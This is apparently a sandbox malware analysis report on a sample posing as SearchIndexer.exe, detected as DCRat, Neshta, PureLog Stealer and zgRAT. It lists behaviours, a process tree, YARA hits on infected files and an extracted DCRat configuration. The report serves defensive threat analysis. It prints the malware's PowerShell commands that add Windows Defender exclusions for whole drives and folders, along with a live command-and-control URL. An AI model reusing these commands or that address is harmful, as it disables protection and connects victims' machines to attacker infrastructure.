Edit tour

Windows Analysis Report
SearchIndexer.exe

Overview

General Information

Sample name:	SearchIndexer.exe
Analysis ID:	1589995
MD5:	f2997dfb6f126670204c83344b678f0e
SHA1:	fb1a90117ff594cac3b2cebbbbd072674f246ce3
SHA256:	73b461a9d859f019ed4f0dda1e0cc86a36b826bde0f318e806503876056b41c0
Tags:	DCRatexeNyashTeamuser-MalHunter3
Infos:

Detection

DCRat, Neshta, PureLog Stealer, zgRAT

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Antivirus / Scanner detection for submitted sample

Antivirus detection for dropped file

Found malware configuration

Malicious sample detected (through community Yara rule)

Multi AV Scanner detection for dropped file

Multi AV Scanner detection for submitted file

Suricata IDS alerts for network traffic

Yara detected DCRat

Yara detected Neshta

Yara detected PureLog Stealer

Yara detected zgRAT

AI detected suspicious sample

Adds a directory exclusion to Windows Defender

Creates an autostart registry key pointing to binary in C:\Windows

Creates an undocumented autostart registry key

Creates multiple autostart registry keys

Drops PE files with a suspicious file extension

Drops executable to a common third party application directory

Drops executables to the windows directory (C:\Windows) and starts them

Drops or copies MsMpEng.exe (Windows Defender, likely to bypass HIPS)

Infects executable files (exe, dll, sys, html)

Loading BitLocker PowerShell Module

Machine Learning detection for dropped file

Machine Learning detection for sample

Queries sensitive Plug and Play Device Information (via WMI, Win32_PnPEntity, often done to detect virtual machines)

Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)

Sample uses string decryption to hide its real strings

Sigma detected: Dot net compiler compiles file from suspicious location

Sigma detected: Files With System Process Name In Unsuspected Locations

Sigma detected: New RUN Key Pointing to Suspicious Folder

Sigma detected: Powershell Base64 Encoded MpPreference Cmdlet

Sigma detected: Suspicious Script Execution From Temp Folder

Sigma detected: System File Execution Location Anomaly

Tries to harvest and steal browser information (history, passwords, etc)

Allocates memory with a write watch (potentially for evading sandboxes)

Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)

Compiles C# or VB.Net code

Contains long sleeps (>= 3 min)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Creates files inside the system directory

Deletes files inside the Windows folder

Detected potential crypto function

Drops PE files

Drops PE files to the application program directory (C:\ProgramData)

Drops PE files to the windows directory (C:\Windows)

Drops files with a non-matching file extension (content does not match file extension)

Enables debug privileges

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found dropped PE file which has not been started or loaded

Installs a raw input device (often for capturing keystrokes)

May sleep (evasive loops) to hinder dynamic analysis

Queries disk information (often used to detect virtual machines)

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive Operating System Information (via WMI, Win32_ComputerSystem, often done to detect virtual machines)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Sigma detected: Classes Autorun Keys Modification

Sigma detected: CurrentVersion Autorun Keys Modification

Sigma detected: CurrentVersion NT Autorun Keys Modification

Sigma detected: Dynamic .NET Compilation Via Csc.EXE

Sigma detected: Powershell Defender Exclusion

Sigma detected: Unusual Parent Process For Cmd.EXE

Sigma detected: Use NTFS Short Name in Command Line

Sigma detected: Use Short Name Path in Command Line

Uses 32bit PE files

Uses a known web browser user agent for HTTP communication

Uses code obfuscation techniques (call, push, ret)

Yara signature match

Classification

Process Tree

System is w10x64

SearchIndexer.exe (PID: 6636 cmdline: "C:\Users\user\Desktop\SearchIndexer.exe" MD5: F2997DFB6F126670204C83344B678F0E)

SearchIndexer.exe (PID: 3168 cmdline: "C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe" MD5: 3E3FE7663181211E5983DA48431DDF33)

csc.exe (PID: 4320 cmdline: "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\qhmtfwmp\qhmtfwmp.cmdline" MD5: F65B029562077B648A6A5F6A1AA76A66)

conhost.exe (PID: 916 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cvtres.exe (PID: 5180 cmdline: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESF5B1.tmp" "c:\Windows\System32\CSC8B0546412F3A4425A5D7AA169F4D63A4.TMP" MD5: C877CBB966EA5939AA2A17B6A5160950)

powershell.exe (PID: 4548 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 1076 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

WmiPrvSE.exe (PID: 6228 cmdline: C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding MD5: 60FF40CFD7FB8FE41EE4FE9AE5FE1C51)

powershell.exe (PID: 1352 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$Recycle.Bin/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 6128 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 4476 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/$WinREAgent/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3060 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 180 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Documents and Settings/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 3868 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5448 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/PerfLogs/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7184 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7080 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 4320 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 5332 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Program Files (x86)/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7212 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 2000 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/ProgramData/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7228 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7196 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Recovery/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7316 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7220 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/System Volume Information/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7280 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7248 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Users/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7308 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7268 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:/Windows/' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7348 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7296 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows defender\SearchIndexer.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7452 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7332 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Windows\Provisioning\Packages\tAVtSoJGTaCxrZiXcJn.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7416 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7356 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows nt\TableTextService\en-US\tAVtSoJGTaCxrZiXcJn.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7460 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7372 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files\Windows Photo Viewer\RuntimeBroker.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7476 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7388 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Program Files (x86)\windows multimedia platform\tAVtSoJGTaCxrZiXcJn.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7536 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

powershell.exe (PID: 7404 cmdline: "powershell" -Command Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\3582-490\SearchIndexer.exe' MD5: 04029E121A0CFA5991749937DD22A1D9)

conhost.exe (PID: 7488 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

cmd.exe (PID: 7956 cmdline: "C:\Windows\System32\cmd.exe" /C "C:\Users\user\AppData\Local\Temp\3vTESgZFSf.bat" MD5: 8A2122E8162DBEF04694B9C3E0B6CDEE)

conhost.exe (PID: 8028 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)

chcp.com (PID: 8800 cmdline: chcp 65001 MD5: 33395C4732A49065EA72590B14B64F32)

w32tm.exe (PID: 9180 cmdline: w32tm /stripchart /computer:localhost /period:5 /dataonly /samples:2 MD5: 81A82132737224D324A3E8DA993E2FB5)

tAVtSoJGTaCxrZiXcJn.exe (PID: 8740 cmdline: "C:\Program Files (x86)\windows nt\TableTextService\en-US\tAVtSoJGTaCxrZiXcJn.exe" MD5: 3E3FE7663181211E5983DA48431DDF33)

svchost.com (PID: 7320 cmdline: "C:\Windows\svchost.com" "C:\PROGRA~2\WI7A8C~1\TAVTSO~1.EXE" MD5: 36FD5E09C417C767A952B4609D73A54B)

tAVtSoJGTaCxrZiXcJn.exe (PID: 3492 cmdline: C:\PROGRA~2\WI7A8C~1\TAVTSO~1.EXE MD5: 3E3FE7663181211E5983DA48431DDF33)

svchost.com (PID: 9192 cmdline: "C:\Windows\svchost.com" "C:\PROGRA~1\WI8A19~1\RUNTIM~1.EXE" MD5: 36FD5E09C417C767A952B4609D73A54B)

RuntimeBroker.exe (PID: 9180 cmdline: C:\PROGRA~1\WI8A19~1\RUNTIM~1.EXE MD5: 3E3FE7663181211E5983DA48431DDF33)

svchost.com (PID: 5080 cmdline: "C:\Windows\svchost.com" "C:\Users\user\AppData\Local\Temp\3582-490\SEARCH~1.EXE" MD5: 36FD5E09C417C767A952B4609D73A54B)

SearchIndexer.exe (PID: 4820 cmdline: C:\Users\user\AppData\Local\Temp\3582-490\SEARCH~1.EXE MD5: 3E3FE7663181211E5983DA48431DDF33)

svchost.exe (PID: 9036 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: B7F884C1B74A263F746EE12A5F7C9F6A)

svchost.com (PID: 3220 cmdline: "C:\Windows\svchost.com" "C:\PROGRA~2\WI7A8C~1\TAVTSO~1.EXE" MD5: 36FD5E09C417C767A952B4609D73A54B)

tAVtSoJGTaCxrZiXcJn.exe (PID: 2252 cmdline: C:\PROGRA~2\WI7A8C~1\TAVTSO~1.EXE MD5: 3E3FE7663181211E5983DA48431DDF33)

svchost.com (PID: 1456 cmdline: "C:\Windows\svchost.com" "C:\PROGRA~1\WI8A19~1\RUNTIM~1.EXE" MD5: 36FD5E09C417C767A952B4609D73A54B)

RuntimeBroker.exe (PID: 2248 cmdline: C:\PROGRA~1\WI8A19~1\RUNTIM~1.EXE MD5: 3E3FE7663181211E5983DA48431DDF33)

svchost.com (PID: 5100 cmdline: "C:\Windows\svchost.com" "C:\Users\user\AppData\Local\Temp\3582-490\SEARCH~1.EXE" MD5: 36FD5E09C417C767A952B4609D73A54B)

SearchIndexer.exe (PID: 5296 cmdline: C:\Users\user\AppData\Local\Temp\3582-490\SEARCH~1.EXE MD5: 3E3FE7663181211E5983DA48431DDF33)

svchost.com (PID: 4812 cmdline: "C:\Windows\svchost.com" "C:\PROGRA~2\WI7A8C~1\TAVTSO~1.EXE" MD5: 36FD5E09C417C767A952B4609D73A54B)

tAVtSoJGTaCxrZiXcJn.exe (PID: 2924 cmdline: C:\PROGRA~2\WI7A8C~1\TAVTSO~1.EXE MD5: 3E3FE7663181211E5983DA48431DDF33)

svchost.com (PID: 6332 cmdline: "C:\Windows\svchost.com" "C:\PROGRA~1\WI8A19~1\RUNTIM~1.EXE" MD5: 36FD5E09C417C767A952B4609D73A54B)

RuntimeBroker.exe (PID: 6480 cmdline: C:\PROGRA~1\WI8A19~1\RUNTIM~1.EXE MD5: 3E3FE7663181211E5983DA48431DDF33)

svchost.com (PID: 7008 cmdline: "C:\Windows\svchost.com" "C:\Users\user\AppData\Local\Temp\3582-490\SEARCH~1.EXE" MD5: 36FD5E09C417C767A952B4609D73A54B)

SearchIndexer.exe (PID: 7124 cmdline: C:\Users\user\AppData\Local\Temp\3582-490\SEARCH~1.EXE MD5: 3E3FE7663181211E5983DA48431DDF33)

svchost.com (PID: 5132 cmdline: "C:\Windows\svchost.com" "C:\Windows\Provisioning\Packages\TAVTSO~1.EXE" MD5: 36FD5E09C417C767A952B4609D73A54B)

tAVtSoJGTaCxrZiXcJn.exe (PID: 8132 cmdline: C:\Windows\Provisioning\Packages\TAVTSO~1.EXE MD5: 3E3FE7663181211E5983DA48431DDF33)

cleanup

Malware Threat Intel

Provided by

Name	Description	Attribution	Blogpost URLs	Link
DCRat	DCRat is a typical RAT that has been around since at least June 2019.	No Attribution	https://axmahr.github.io/posts/asyncrat-detection/ https://blog.sekoia.io/privateloader-the-loader-of-the-prevalent-ruzki-ppi-service/ https://blog.talosintelligence.com/2021/10/crimeware-targets-afghanistan-india.html https://blog.talosintelligence.com/2022/08/modernloader-delivers-multiple-stealers.html https://blogs.blackberry.com/en/2022/01/kraken-the-code-on-prometheus	https://malpedia.caad.fkie.fraunhofer.de/details/win.dcrat

Name	Description	Attribution	Blogpost URLs	Link
neshta	Neshta is a 2005 Belarusian file infector virus written in Delphi. The name of the virus comes from the Belarusian word "nesta" meaning "something."	No Attribution	https://threatvector.cylance.com/en_us/home/threat-spotlight-neshta-file-infector-endures.html https://www.mandiant.com/resources/pe-file-infecting-malware-ot https://www.virusbulletin.com/virusbulletin/2014/08/bird-s-nest https://www.virusradar.com/en/Win32_Neshta.A/description	https://malpedia.caad.fkie.fraunhofer.de/details/win.neshta

Name	Description	Attribution	Blogpost URLs	Link
zgRAT	zgRAT is a Remote Access Trojan malware which sometimes drops other malware such as AgentTesla malware. zgRAT has an inforstealer use which targets browser information and cryptowallets.Usually spreads by USB or phishing emails with -zip/-lnk/.bat/.xlsx attachments and so on.	No Attribution	https://bazaar.abuse.ch/browse/signature/zgRAT/ https://kcm.trellix.com/corporate/index?page=content&id=KB96190&locale=en_US https://www.cloudsek.com/blog/threat-actors-abuse-ai-generated-youtube-videos-to-spread-stealer-malware https://www.difesaesicurezza.com/cyber/cybercrime-rfq-dalla-turchia-veicola-agenttesla-e-zgrat/ https://www.fortinet.com/blog/threat-research/smokeloader-using-old-vulnerabilities	https://malpedia.caad.fkie.fraunhofer.de/details/win.zgrat

Malware Configuration

Threatname: DCRat

{"C2 url": "http://519600cl.nyashtop.top/authDatalifeCdnTemporary", "MUTEX": "DCR_MUTEX-QVgodjXaIbAcRVoIzEKD", "Params": {"0": "{SYSTEMDRIVE}/Users/", "1": "false", "2": "false", "3": "true", "4": "true", "5": "true", "6": "true", "7": "false", "8": "true", "9": "true", "10": "true", "11": "true", "12": "true", "13": "true", "14": "true"}}

Yara Signatures

Initial Sample

Source	Rule	Description	Author	Strings
SearchIndexer.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
SearchIndexer.exe	JoeSecurity_zgRAT_1	Yara detected zgRAT	Joe Security
SearchIndexer.exe	JoeSecurity_PureLogStealer	Yara detected PureLog Stealer	Joe Security
SearchIndexer.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]

Dropped Files

Source	Rule	Description	Author	Strings
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX86\Microsoft Shared\DW\DW20.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\Common.DBConnection64.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\SDXHelper.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Common Files\Microsoft Shared\VSTO\10.0\VSTOInstaller.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Client\AppVDllSurrogate64.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\misc.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\Office16\aimgr.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Java\jre-1.8\bin\unpack200.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\AutoIt3\Uninstall.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\AutoIt3\Uninstall.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\msoev.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Google\Update\1.3.36.312\GoogleCrashHandler64.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\ProgramData\Microsoft\Windows Defender\Platform\4.18.23080.2006-0\MpDlpCmd.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Java\jre-1.8\bin\ssvagent.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft\Edge\Application\117.0.2045.47\cookie_exporter.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\CNFNOT32.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\AppSharingHookController.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\DCF\DATABASECOMPARE.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\WINWORD.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\Microsoft Office\root\Office16\CLVIEW.EXE	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	JoeSecurity_Neshta	Yara detected Neshta	Joe Security
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
C:\Program Files (x86)\AutoIt3\Aut2Exe\Aut2exe.exe	MALWARE_Win_Neshta	Detects Neshta	ditekSHen	0xa0e0:$s1: Delphi-the best. Fuck off all the rest. Neshta 1.0 Made in Belarus. 0xa1a8:$s2: ! Best regards 2 Tommy Salo. [Nov-2005] yours [Dziadulja Apanas]
